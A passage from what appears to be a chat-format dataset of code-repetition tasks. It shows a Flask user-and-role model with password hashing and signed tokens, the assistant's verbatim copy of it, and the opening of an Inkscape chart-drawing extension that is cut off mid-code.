db.Column(db.Integer, db.ForeignKey('users.id'))\n oauth_provider = db.Column(db.String(255))\n oauth_id = db.Column(db.String(255))\n oauth_token = db.Column(db.String(255))\n oauth_secret = db.Column(db.String(255))\n display_name = db.Column(db.String(255))\n full_name = db.Column(db.String(255))\n profile_url = db.Column(db.String(512))\n image_url = db.Column(db.String(512))\n\nlogin_manager.anonymous_user = AnonymousUser\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n```\nRepeat the code exactly as written.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\nfrom datetime import datetime\nimport hashlib\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer\nfrom flask import current_app\nfrom flask.ext.login import UserMixin, AnonymousUserMixin\nfrom .. import db, login_manager\n\n\nclass Permission:\n ADMINISTER = 0x80\n\n\nclass Role(db.Model):\n __tablename__ = 'roles'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(64), unique=True)\n default = db.Column(db.Boolean, default=False, index=True)\n permissions = db.Column(db.Integer)\n users = db.relationship('User', backref='role', lazy='dynamic')\n\n @staticmethod\n def insert_roles():\n roles = {\n 'User': (0x00, True),\n 'Administrator': (0xff, False)\n }\n for r in roles:\n role = Role.query.filter_by(name=r).first()\n if role is None:\n role = Role(name=r)\n role.permissions = roles[r][0]\n role.default = roles[r][1]\n db.session.add(role)\n db.session.commit()\n\n def __repr__(self):\n return '<Role %r>' % self.name\n\n\nclass User(UserMixin, db.Model):\n __tablename__ = 'users'\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(db.String(64), unique=True, index=True)\n role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))\n password_hash = db.Column(db.String(128))\n confirmed = db.Column(db.Boolean, default=False)\n name = db.Column(db.String(64))\n location = db.Column(db.String(64))\n about_me = db.Column(db.Text())\n member_since = db.Column(db.DateTime(), default=datetime.utcnow)\n last_seen = db.Column(db.DateTime(), default=datetime.utcnow)\n connections = db.relationship('Connection',\n backref=db.backref('user', lazy='joined'), cascade=\"all\")\n estimates = db.relationship(\"Estimate\", backref='user')\n\n @staticmethod\n def generate_fake(count=100):\n from sqlalchemy.exc import IntegrityError\n from random import seed\n import forgery_py\n\n seed()\n for i in range(count):\n u = User(email=forgery_py.internet.email_address(),\n password=forgery_py.lorem_ipsum.word(),\n confirmed=True,\n name=forgery_py.name.full_name(),\n location=forgery_py.address.city(),\n about_me=forgery_py.lorem_ipsum.sentence(),\n member_since=forgery_py.date.date(True))\n db.session.add(u)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n def __init__(self, **kwargs):\n super(User, self).__init__(**kwargs)\n if self.role is None:\n self.role = Role.query.filter_by(default=True).first()\n\n @property\n def password(self):\n raise AttributeError('password is not a readable attribute')\n\n @password.setter\n def password(self, password):\n self.password_hash = generate_password_hash(password)\n\n def verify_password(self, password):\n return check_password_hash(self.password_hash, password)\n\n def generate_confirmation_token(self, expiration=3600):\n s = Serializer(current_app.config['SECRET_KEY'], expiration)\n return s.dumps({'confirm': self.id})\n\n def confirm(self, token):\n s = Serializer(current_app.config['SECRET_KEY'])\n try:\n data = s.loads(token)\n except:\n return False\n if data.get('confirm') != self.id:\n return False\n self.confirmed = True\n db.session.add(self)\n return True\n\n def generate_reset_token(self, expiration=3600):\n s = Serializer(current_app.config['SECRET_KEY'], expiration)\n return s.dumps({'reset': self.id})\n\n def reset_password(self, token, new_password):\n s = Serializer(current_app.config['SECRET_KEY'])\n try:\n data = s.loads(token)\n except:\n return False\n if data.get('reset') != self.id:\n return False\n self.password = new_password\n db.session.add(self)\n return True\n\n def generate_email_change_token(self, new_email, expiration=3600):\n s = Serializer(current_app.config['SECRET_KEY'], expiration)\n return s.dumps({'change_email': self.id, 'new_email': new_email})\n\n def change_email(self, token):\n s = Serializer(current_app.config['SECRET_KEY'])\n try:\n data = s.loads(token)\n except:\n return False\n if data.get('change_email') != self.id:\n return False\n new_email = data.get('new_email')\n if new_email is None:\n return False\n if self.query.filter_by(email=new_email).first() is not None:\n return False\n self.email = new_email\n db.session.add(self)\n return True\n\n def can(self, permissions):\n return self.role is not None and \\\n (self.role.permissions & permissions) == permissions\n\n def is_administrator(self):\n return self.can(Permission.ADMINISTER)\n\n def ping(self):\n self.last_seen = datetime.utcnow()\n db.session.add(self)\n\n def to_json(self):\n json_user = {\n 'member_since': self.member_since,\n 'last_seen': self.last_seen,\n }\n return json_user\n\n def generate_auth_token(self, expiration):\n s = Serializer(current_app.config['SECRET_KEY'],\n expires_in=expiration)\n return s.dumps({'id': self.id}).decode('ascii')\n\n @staticmethod\n def verify_auth_token(token):\n s = Serializer(current_app.config['SECRET_KEY'])\n try:\n data = s.loads(token)\n except:\n return None\n return User.query.get(data['id'])\n\n def __repr__(self):\n return '<User %r>' % self.email\n\n\nclass AnonymousUser(AnonymousUserMixin):\n def can(self, permissions):\n return False\n\n def is_administrator(self):\n return False\n\nclass Connection(db.Model):\n __tablename__ = \"connections\"\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n oauth_provider = db.Column(db.String(255))\n oauth_id = db.Column(db.String(255))\n oauth_token = db.Column(db.String(255))\n oauth_secret = db.Column(db.String(255))\n display_name = db.Column(db.String(255))\n full_name = db.Column(db.String(255))\n profile_url = db.Column(db.String(512))\n image_url = db.Column(db.String(512))\n\nlogin_manager.anonymous_user = AnonymousUser\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n```<|memory_end|>\nRepeat the code exactly as written.",
"role": "user"
}
] |
```python
from datetime import datetime
import hashlib
from werkzeug.security import generate_password_hash, check_password_hash
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from flask import current_app
from flask.ext.login import UserMixin, AnonymousUserMixin
from .. import db, login_manager
class Permission:
ADMINISTER = 0x80
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
default = db.Column(db.Boolean, default=False, index=True)
permissions = db.Column(db.Integer)
users = db.relationship('User', backref='role', lazy='dynamic')
@staticmethod
def insert_roles():
roles = {
'User': (0x00, True),
'Administrator': (0xff, False)
}
for r in roles:
role = Role.query.filter_by(name=r).first()
if role is None:
role = Role(name=r)
role.permissions = roles[r][0]
role.default = roles[r][1]
db.session.add(role)
db.session.commit()
def __repr__(self):
return '<Role %r>' % self.name
class User(UserMixin, db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(64), unique=True, index=True)
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
password_hash = db.Column(db.String(128))
confirmed = db.Column(db.Boolean, default=False)
name = db.Column(db.String(64))
location = db.Column(db.String(64))
about_me = db.Column(db.Text())
member_since = db.Column(db.DateTime(), default=datetime.utcnow)
last_seen = db.Column(db.DateTime(), default=datetime.utcnow)
connections = db.relationship('Connection',
backref=db.backref('user', lazy='joined'), cascade="all")
estimates = db.relationship("Estimate", backref='user')
@staticmethod
def generate_fake(count=100):
from sqlalchemy.exc import IntegrityError
from random import seed
import forgery_py
seed()
for i in range(count):
u = User(email=forgery_py.internet.email_address(),
password=forgery_py.lorem_ipsum.word(),
confirmed=True,
name=forgery_py.name.full_name(),
location=forgery_py.address.city(),
about_me=forgery_py.lorem_ipsum.sentence(),
member_since=forgery_py.date.date(True))
db.session.add(u)
try:
db.session.commit()
except IntegrityError:
db.session.rollback()
def __init__(self, **kwargs):
super(User, self).__init__(**kwargs)
if self.role is None:
self.role = Role.query.filter_by(default=True).first()
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def generate_confirmation_token(self, expiration=3600):
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'confirm': self.id})
def confirm(self, token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return False
if data.get('confirm') != self.id:
return False
self.confirmed = True
db.session.add(self)
return True
def generate_reset_token(self, expiration=3600):
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'reset': self.id})
def reset_password(self, token, new_password):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return False
if data.get('reset') != self.id:
return False
self.password = new_password
db.session.add(self)
return True
def generate_email_change_token(self, new_email, expiration=3600):
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'change_email': self.id, 'new_email': new_email})
def change_email(self, token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return False
if data.get('change_email') != self.id:
return False
new_email = data.get('new_email')
if new_email is None:
return False
if self.query.filter_by(email=new_email).first() is not None:
return False
self.email = new_email
db.session.add(self)
return True
def can(self, permissions):
return self.role is not None and \
(self.role.permissions & permissions) == permissions
def is_administrator(self):
return self.can(Permission.ADMINISTER)
def ping(self):
self.last_seen = datetime.utcnow()
db.session.add(self)
def to_json(self):
json_user = {
'member_since': self.member_since,
'last_seen': self.last_seen,
}
return json_user
def generate_auth_token(self, expiration):
s = Serializer(current_app.config['SECRET_KEY'],
expires_in=expiration)
return s.dumps({'id': self.id}).decode('ascii')
@staticmethod
def verify_auth_token(token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return None
return User.query.get(data['id'])
def __repr__(self):
return '<User %r>' % self.email
class AnonymousUser(AnonymousUserMixin):
def can(self, permissions):
return False
def is_administrator(self):
return False
class Connection(db.Model):
__tablename__ = "connections"
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
oauth_provider = db.Column(db.String(255))
oauth_id = db.Column(db.String(255))
oauth_token = db.Column(db.String(255))
oauth_secret = db.Column(db.String(255))
display_name = db.Column(db.String(255))
full_name = db.Column(db.String(255))
profile_url = db.Column(db.String(512))
image_url = db.Column(db.String(512))
login_manager.anonymous_user = AnonymousUser
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
```
|
[
{
"content": "Replicate the source code:\n```python\n#!/usr/bin/env python\n\n# nicechart.py\n#\n# Copyright 2011 \n# \n# Christoph Sterz \n# Florian Weber \n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n# \n# \n\n\n\n\n# These two lines are only needed if you don't put the script directly into\n# the installation directory\nimport sys\n#sys.path.append('/usr/share/inkscape/extensions')\n\n# We will use the inkex module with the predefined Effect base class.\nimport inkex\n# The simplestyle module provides functions for style parsing.\nfrom simplestyle import *\nimport math, re, nicechart_colors as nc_colors\n\n\n\nclass NiceChart(inkex.Effect):\n\t\"\"\"\n\tExample Inkscape effect extension.\n\tCreates a new layer with a \"Hello World!\" text centered in the middle of the document.\n\t\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"\n\t\tConstructor.\n\t\tDefines the \"--what\" option of a script.\n\t\t\"\"\"\n\t\t# Call the base class constructor.\n\t\tinkex.Effect.__init__(self)\n\t\t\n\t\t# Define string option \"--what\" with \"-w\" shortcut and default chart values.\n\t\tself.OptionParser.add_option('-w', '--what', action = 'store',\n\t\t\t type = 'string', dest = 'what', default = '22,11,67',\n\t\t\t help = 'Chart Values')\n\t \t\n\t\t# Define string option \"--type\" with \"-t\" shortcut.\n\t\tself.OptionParser.add_option(\"-t\", \"--type\", action=\"store\",\n\t\t\t type=\"string\", dest=\"type\", default='',\n\t\t\t help=\"Chart Type\")\n\t\t\n\t\t# Define bool option \"--blur\" with \"-b\" shortcut.\n\t \tself.OptionParser.add_option(\"-b\", \"--blur\", action=\"store\",\n\t\t\t type=\"inkbool\", dest=\"blur\", default='True',\n\t\t\t help=\"Blur Type\")\n\t\t\n\t\t# Define string option \"--file\" with \"-f\" shortcut.\n\t \tself.OptionParser.add_option(\"-f\", \"--filename\", action=\"store\",\n\t\t\t type=\"string\", dest=\"filename\", default='',\n\t\t\t help=\"Name of File\")\n\t\t\n\t\t# Define string option \"--input_type\" with \"-i\" shortcut.\n\t \tself.OptionParser.add_option(\"-i\", \"--input_type\", action=\"store\",\n\t\t\t type=\"string\", dest=\"input_type\", default='file',\n\t\t\t help=\"Chart Type\")\n\t\t\n\t\t# Define string option \"--delimiter\" with \"-d\" shortcut.\n\t \tself.OptionParser.add_option(\"-d\", \"--delimiter\", action=\"store\",\n\t\t\t type=\"string\", dest=\"csv_delimiter\", default=';',\n\t\t\t help=\"delimiter\")\n\t\t\t \n\t\t# Define string option \"--colors\" with \"-c\" shortcut.\n\t \tself.OptionParser.add_option(\"-c\", \"--colors\", action=\"store\",\n\t\t\t type=\"string\", dest=\"colors\", default='default',\n\t\t\t help=\"color-scheme\")\n\n\t\t# Define string option \"--colors_override\"\n\t \tself.OptionParser.add_option(\"\", \"--colors_override\", action=\"store\",\n\t\t\t type=\"string\", dest=\"colors_override\", default='',\n\t\t\t help=\"color-scheme-override\")\n\t\t\n\n\t\tself.OptionParser.add_option(\"\", \"--reverse_colors\", action=\"store\",\n\t\t\t type=\"inkbool\", dest=\"reverse_colors\", default='False',\n\t\t\t help=\"reverse color-scheme\")\n\t\t\n\t \tself.OptionParser.add_option(\"-k\", \"--col_key\", action=\"store\",\n\t\t\t type=\"int\", dest=\"col_key\", default='0',\n\t\t\t help=\"column that contains the keys\")\n\t\t\n\t\t\n\t \tself.OptionParser.add_option(\"-v\", \"--col_val\", action=\"store\",\n\t\t\t type=\"int\", dest=\"col_val\", default='1',\n\t\t\t help=\"column that contains the values\")\n\t\t\t \n\t \tself.OptionParser.add_option(\"-r\", \"--rotate\", action=\"store\",\n\t\t\t type=\"inkbool\", dest=\"rotate\", default='False',\n\t\t\t help=\"Draw barchart horizontally\")\n\t\t\t\n\t \tself.OptionParser.add_option(\"-W\", \"--bar-width\", action=\"store\",\n\t\t\ttype=\"int\", dest=\"bar_width\", default='10',\n\t\t\thelp=\"width of bars\")\n\t\t\n\t \tself.OptionParser.add_option(\"-p\", \"--pie-radius\", action=\"store\",\n\t\t\ttype=\"int\", dest=\"pie_radius\", default='100',\n\t\t\thelp=\"radius of pie-charts\")\n\t\t\t\n\t \tself.OptionParser.add_option(\"-H\", \"--bar-height\", action=\"store\",\n\t\t\ttype=\"int\", dest=\"bar_height\", default='100',\n\t\t\thelp=\"height of bars\")\n\t\t\t\n\t \tself.OptionParser.add_option(\"-O\", \"--bar-offset\", action=\"store\",\n\t\t\ttype=\"int\", dest=\"bar_offset\", default='5',\n\t\t\thelp=\"distance between bars\")\n\t\t\t\n\t \tself.OptionParser.add_option(\"\", \"--stroke-width\", action=\"store\",\n\t\t\ttype=\"int\", dest=\"stroke_width\", default='2')\n\t\t\t\n\t \tself.OptionParser.add_option(\"-o\", \"--text-offset\", action=\"store\",\n\t\t\ttype=\"int\", dest=\"text_offset\", default='5',\n\t\t\thelp=\"distance between bar and descriptions\")\n\t\t\t\n\t \tself.OptionParser.add_option(\"-F\", \"--font\", action=\"store\",\n\t\t\ttype=\"string\", dest=\"font\", default='sans-serif',\n\t\t\thelp=\"font of description\")\n\t\t\t\n\t \tself.OptionParser.add_option(\"-S\", \"--font-size\", action=\"store\",\n\t\t\ttype=\"int\", dest=\"font_size\", default='10',\n\t\t\thelp=\"font size of description\")\n\t\t\n\t \tself.OptionParser.add_option(\"-C\", \"--font-color\", action=\"store\",\n\t\t\ttype=\"string\", dest=\"font_color\", default='black',\n\t\t\thelp=\"font color of description\")\n\t\t#Dummy:\n\t\tself.OptionParser.add_option(\"\",\"--input_sections\")\n\n\t \tself.OptionParser.add_option(\"-V\", \"--show_values\", action=\"store\",\n\t\t\ttype=\"inkbool\", dest=\"show_values\", default='False',\n\t\t\thelp=\"Show values in chart\")\n\n\t\n\t\n\tdef effect(self):\n\t\t\"\"\"\n\t\tEffect behaviour.\n\t\tOverrides base class' method and inserts a nice looking chart into SVG document.\n\t\t\"\"\"\n\t\t# Get script's \"--what\" option value and process the data type --- i concess the if term is a little bit of magic\n\t\twhat = self.options.what\n\t\tkeys=[]\n\t\tvalues=[]\n\t\torig_values=[]\n\t\tkeys_present=True\n\t\tpie_abs=False\n\t\tcnt=0\n\t\tcsv_file_name=self.options.filename\n\t\tcsv_delimiter=self.options.csv_delimiter\n\t\tinput_type=self.options.input_type\n\t\tcol_key=self.options.col_key\n\t\tcol_val=self.options.col_val\n\t\tshow_values=self.options.show_values\n\t\t\n\t\tif(input_type==\"\\\"file\\\"\"):\n\t\t\tcsv_file=open(csv_file_name,\"r\")\n\t\t\tfor line in csv_file:\n\t\t\t\tvalue=line.split(csv_delimiter)\n\t\t\t\tif(len(value)>=1): #make sure that there is at least one value (someone may want to use it as description)\n\t\t\t\t\tkeys.append(value[col_key])\n\t\t\t\t\tvalues.append(float(value[col_val]))\n\t\t\tcsv_file.close()\n\t\telif(input_type==\"\\\"direct_input\\\"\"):\n\t\t\twhat=re.findall(\"([A-Z|a-z|0-9]+:[0-9]+\\.?[0-9]*)\",what)\n\t\t\tfor value in what:\n\t\t\t\tvalue=value.split(\":\")\n\t\t\t\tkeys.append(value[0])\n\t\t\t\tvalues.append(float(value[1]))\n\n\t\t# Get script's \"--type\" option value.\n\t\tcharttype=self.options.type\n\n\t\tif(charttype==\"pie_abs\"):\n\t\t\tpie_abs=True\n\t\t\tcharttype=\"pie\"\n\n\t\t# Get access to main SVG document element and get its dimensions.\n\t\tsvg = self.document.getroot()\n\t\t\n\t\t# Get the page attibutes:\n\t\twidth = self.getUnittouu(svg.get('width'))\n\t\theight = self.getUnittouu(svg.attrib['height'])\n\t\t\n\t\t# Create a new layer.\n\t\tlayer = inkex.etree.SubElement(svg, 'g')\n\t\tlayer.set(inkex.addNS('label', 'inkscape'), 'Chart-Layer: %s' % (what))\n\t\tlayer.set(inkex.addNS('groupmode', 'inkscape'), 'layer')\n\t\t\n\t\t# Check if Blur should be drawn:\n\t\tdraw_blur=self.options.blur\n\t\t#draw_blur=False\n\t\t\n\t\t# Set Default Colors\n\t\tself.options.colors_override.strip()\n\t\tif (len(self.options.colors_override)>0):\n\t\t\tColors=self.options.colors_override\n\t\telse:\n\t\t\tColors=self.options.colors\n\n\t\tif(Colors[0].isalpha()):\n\t\t\tColors=nc_colors.get_color_scheme(Colors)\n\t\telse:\n\t\t\tColors=re.findall(\"(#[0-9a-fA-F]{6})\",Colors)\n\t\t\t#to be sure we create a fallback:\n\t\t\tif(len(Colors)==0):\n\t\t\t\tColors=nc_colors.get_color_scheme()\n\t\t\n\t\tcolor_count=len(Colors)\n\t\t\n\t\t\n\t\tif(self.options.reverse_colors):\n\t\t\tColors.reverse()\n\t\t\n\t\t#Those values should be self-explaining:\n\t\tbar_height=self.options.bar_height\n\t\tbar_width=self.options.bar_width\n\t\tbar_offset=self.options.bar_offset\n\t\t#offset of the description in stacked-bar-charts:\n\t\t#stacked_bar_text_offset=self.options.stacked_bar_text_offset\n\t\ttext_offset=self.options.text_offset\n\t\t\n\t\t#get font\n\t\tfont=self.options.font\n\t\tfont_size=self.options.font_size\n\t\tfont_color=self.options.font_color\n\t\t\n\t\t\n\t\t\n\t\t#get rotation\n\t\trotate = self.options.rotate\n\t\t\n\t\tpie_radius=self.options.pie_radius\n\t\tstroke_width=self.options.stroke_width\n\n\t\tif(charttype==\"bar\"):\n\t\t#########\n\t\t###BAR###\n\t\t#########\n\t\t\t\n\t\t\t#iterate all values, use offset to draw the bars in different places\n\t\t\toffset=0\n\t\t\tcolor=0\n\t\t\t\n\t\t\t# Normalize the bars to the largest value\n\t\t\ttry:\n\t\t\t\tvalue_max=max(values)\n\t\t\texcept ValueError:\n\t\t\t\tvalue_max=0.0\n\n\t\t\tfor x in range(len(values)):\n\t\t\t\torig_values.append(values[x])\n\t\t\t\tvalues[x]=(values[x]/value_max)*bar_height\n\t\t\t\n\t\t\t# Get defs of Document\n\t\t\tdefs = self.xpathSingle('/svg:svg//svg:defs')\n\t\t\tif defs == None:\n\t\t\t\tdefs = inkex.etree.SubElement(self.document.getroot(),inkex.addNS('defs','svg'))\n\t\t\t\t\n\t\t\t# Create new Filter\n\t\t\tfilt = inkex.etree.SubElement(defs,inkex.addNS('filter','svg'))\n\t\t\tfiltId = self.uniqueId('filter')\n\t\t\tself.filtId = 'filter:url(#%s);' % filtId\n\t\t\tfor k, v in [('id', filtId), ('height', \"3\"),\n\t\t\t\t\t\t ('width', \"3\"),\n\t\t\t\t\t\t ('x', '-0.5'), ('y', '-0.5')]:\n\t\t\t\tfilt.set(k, v)\n\t\t\t\n\t\t\t# Append Gaussian Blur to that Filter\n\t\t\tfe = inkex.etree.SubElement(filt,inkex.addNS('feGaussianBlur','svg'))\n\t\t\tfe.set('stdDeviation', \"1.1\")\n\t\t\t \n\t\t\t# Draw Single bars with their shadows\n\t\t\tfor value in values:\n\t\t\t\t\n\t\t\t\t#draw blur, if it is wanted\n\t\t\t\tif(draw_blur):\n\t\t\t\t\t# Create shadow element\n\t\t\t\t\tshadow = inkex.etree.Element(inkex.addNS(\"rect\",\"svg\"))\n\t\t\t\t\t# Set chart position to center of document. Make it horizontal or vertical\n\t\t\t\t\tif(not rotate):\n\t\t\t\t\t\tshadow.set('x', str(width / 2 + offset +1))\n\t\t\t\t\t\tshadow.set('y', str(height / 2 - int(value)+1))\n\t\t\t\t\telse:\n\t\t\t\t\t\tshadow.set('y', str(width / 2 + offset +1))\n\t\t\t\t\t\tshadow.set('x', str(height / 2 +1))\n\t\t\t\t\t# Set shadow properties\n\t\t\t\t\tif(not rotate):\n\t\t\t\t\t\tshadow.set(\"width\", str(bar_width))\n\t\t\t\t\t\tshadow.set(\"height\", str(int(value)))\n\t\t\t\t\telse:\n\t\t\t\t\t\tshadow.set(\"height\", str(bar_width))\n\t\t\t\t\t\tshadow.set(\"width\", str(int(value)))\n\t\t\t\t\t# Set shadow blur (connect to filter object in xml path)\n\t\t\t\t\tshadow.set(\"style\",\"filter:url(#filter)\")\n\t\t\t\t\n\t\t\t\t# Create rectangle element\n\t\t\t\t#shadow = inkex.etree.Element(inkex.addNS(\"rect\",\"svg\"))\n\t\t\t\trect = inkex.etree.Element(inkex.addNS('rect','svg'))\n\t\t\t\t\n\t\t\t\t# Set chart position to center of document.\n\t\t\t\tif(not rotate):\n\t\t\t\t\trect.set('x', str(width/2+offset))\n\t\t\t\t\trect.set('y', str(height/2-int(value)))\n\t\t\t\telse:\n\t\t\t\t\trect.set('y', str(width/2+offset))\n\t\t\t\t\trect.set('x', str(height/2))\n\t\t\t\t# Set rectangle properties\n\t\t\t\tif(not rotate):\n\t\t\t\t\trect.set(\"width\", str(bar_width))\n\t\t\t\t\trect.set(\"height\", str(int(value)))\n\t\t\t\telse:\n\t\t\t\t\trect.set(\"height\", str(bar_width))\n\t\t\t\t\trect.set(\"width\", str(int(value)))\n\t\t\t\t\t\n\t\t\t\trect.set(\"style\",\"fill:\"+Colors[color%color_count])\n\t\t\t\t\n\t\t\t\t# Set shadow blur (connect to filter object in xml path)\n\t\t\t\tif(draw_blur):\n\t\t\t\t\tshadow.set(\"style\",\"filter:url(#filter)\")\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t# If keys are given create text elements\n\t\t\t\tif(keys_present):\n\t\t\t\t\ttext = inkex.etree.Element(inkex.addNS('text','svg'))\n\t\t\t\t\tif(not rotate): #=vertical\n\t\t\t\t\t\ttext.set(\"transform\",\"matrix(0,-1,1,0,0,0)\")\n\t\t\t\t\t\t#y after rotation:\n\t\t\t\t\t\ttext.set(\"x\", \"-\"+str(height/2+text_offset)) \n\t\t\t\t\t\t#x after rotation:\n\t\t\t\t\t\ttext.set(\"y\", str(width/2+offset+bar_width/2+font_size/3))\n\t\t\t\t\telse: #=horizontal\n\t\t\t\t\t\ttext.set(\"y\", str(width/2+offset+bar_width/2+font_size/3))\n\t\t\t\t\t\ttext.set(\"x\", str(height/2-text_offset))\n\t\t\t\t\t\n\t\t\t\t\ttext.set(\"style\",\"font-size:\"+str(font_size)\\\n\t\t\t\t\t+\"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:\"\\\n\t\t\t\t\t+font+\";-inkscape-font-specification:Bitstream Charter;text-align:end;text-anchor:end;fill:\"\\\n\t\t\t\t\t+font_color)\n\n\t\t\t\t\ttext.text=keys[cnt]\n\t\t\t\t\t#cnt=cnt+1\n\n\t\t\t\t# Increase Offset and Color\n\t\t\t\t#offset=offset+bar_width+bar_offset\n\t\t\t\tcolor=(color+1)%8\n\t\t\t\t# Connect elements together.\n\t\t\t\tif(draw_blur):\n\t\t\t\t\tlayer.append(shadow)\n\t\t\t\tlayer.append(rect)\n\t\t\t\tif(keys_present):\n\t\t\t\t\tlayer.append(text)\n\t\t\t\t\t\n\t\t\t\tif(show_values):\n\t\t\t\t vtext = inkex.etree.Element(inkex.addNS('text','svg'))\n\t\t\t\t if(not rotate): #=vertical\n\t\t\t\t\t vtext.set(\"transform\",\"matrix(0,-1,1,0,0,0)\")\n\t\t\t\t\t #y after rotation:\n\t\t\t\t\t vtext.set(\"x\", \"-\"+str(height/2+text_offset-value-text_offset-text_offset)) \n\t\t\t\t\t #x after rotation:\n\t\t\t\t\t vtext.set(\"y\", str(width/2+offset+bar_width/2+font_size/3))\n\t\t\t\t else: #=horizontal\n\t\t\t\t\t vtext.set(\"y\", str(width/2+offset+bar_width/2+font_size/3))\n\t\t\t\t\t vtext.set(\"x\", str(height/2-text_offset+value+text_offset+text_offset))\n\n\t\t\t\t vtext.set(\"style\",\"font-size:\"+str(font_size)\\\n\t\t\t\t +\"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:\"\\\n\t\t\t\t +font+\";-inkscape-font-specification:Bitstream Charter;text-align:start;text-anchor:start;fill:\"\\\n\t\t\t\t +font_color)\n\n\t\t\t\t vtext.text=str(int(orig_values[cnt]))\n\t\t\t\t layer.append(vtext)\n\t\t\t\t\n\t\t\t\tcnt=cnt+1\n\t\t\t\toffset=offset+bar_width+bar_offset\n\t\t\t\t\n\n\t\t\t\t\n\t\telif(charttype==\"pie\"):\n\t\t#########\n\t\t###PIE###\n\t\t#########\n\t\t\t# Iterate all values to draw the different slices\n\t\t\tcolor=0\n\t\t\t\n\t\t\t# Set Default Colors\n\t\t\t\n\t\t\t# Get defs of Document\n\t\t\tdefs = self.xpathSingle('/svg:svg//svg:defs')\n\t\t\tif defs == None:\n\t\t\t\t\tdefs = inkex.etree.SubElement(self.document.getroot(),inkex.addNS('defs','svg'))\n\t\t\t\t\n\t\t\t# Create new Filter\n\t\t\tfilt = inkex.etree.SubElement(defs,inkex.addNS('filter','svg'))\n\t\t\tfiltId = self.uniqueId('filter')\n\t\t\tself.filtId = 'filter:url(#%s);' % filtId\n\t\t\tfor k, v in [('id', filtId), ('height', \"3\"),\n\t\t\t\t\t\t ('width', \"3\"),\n\t\t\t\t\t\t ('x', '-0.5'), ('y', '-0.5')]:\n\t\t\t\tfilt.set(k, v)\n\t\t\t# Append Gaussian Blur to that Filter\n\t\t\tfe = inkex.etree.SubElement(filt,inkex.addNS('feGaussianBlur','svg'))\n\t\t\tfe.set('stdDeviation', \"1.1\")\n\t\t\t\n\t\t\t# Add a grey background circle\n\t\t\tbackground=inkex.etree.Element(inkex.addNS(\"circle\",\"svg\"))\n\t\t\tbackground.set(\"cx\", str(width/2))\n\t\t\tbackground.set(\"cy\", str(height/2))\n\t\t\tbackground.set(\"r\", str(pie_radius))\n\t\t\t\n\t\t\tif pie_abs:\n\t\t\t\tbackground.set(\"style\",\"stroke:#ececec;fill:#f9f9f9\")\n\t\t\t\n\t\t\telse:\n\t\t\t\tbackground.set(\"style\",\"fill:#aaaaaa;stroke:none\")\n\n\t\t\tlayer.append(background)\n\t\t\t\n\t\t\t#create value sum in order to divide the slices\n\t\t\ttry:\n\t\t\t\tvaluesum=sum(values)\n\t\t\t\t\n\t\t\texcept ValueError:\n\t\t\t\tvaluesum=0\n\n\t\t\t\t\n\t\t\tif pie_abs:\n\t\t\t\tvaluesum=100\n\n\t\t\t# Set an offsetangle\n\t\t\toffset=0\n\t\t\t\n\t\t\t# Draw single slices with their shadow\n\t\t\tfor value in values:\n\t\t\t\t# Calculate the PI-angles for start and end\n\t\t\t\tangle=(2*3.141592)/valuesum*float(value)\n\t\t\t\t\n\t\t\t\t# Create the shadow first (if it should be created):\n\t\t\t\tif(draw_blur):\n\t\t\t\t\tshadow=inkex.etree.Element(inkex.addNS(\"path\",\"svg\"))\n\t\t\t\t\tshadow.set(inkex.addNS('type', 'sodipodi'), 'arc')\n\t\t\t\t\tshadow.set(inkex.addNS('cx', 'sodipodi'), str(width/2))\n\t\t\t\t\tshadow.set(inkex.addNS('cy', 'sodipodi'), str(height/2))\n\t\t\t\t\tshadow.set(inkex.addNS('rx', 'sodipodi'), str(pie_radius))\n\t\t\t\t\tshadow.set(inkex.addNS('ry', 'sodipodi'), str(pie_radius))\n\t\t\t\t\tshadow.set(inkex.addNS('start', 'sodipodi'), str(offset))\n\t\t\t\t\tshadow.set(inkex.addNS('end', 'sodipodi'), str(offset+angle))\n\t\t\t\t\tshadow.set(\"style\",\"filter:url(#filter);fill:#000000\")\n\t\t\t\t\n\t\t\t\t#then add 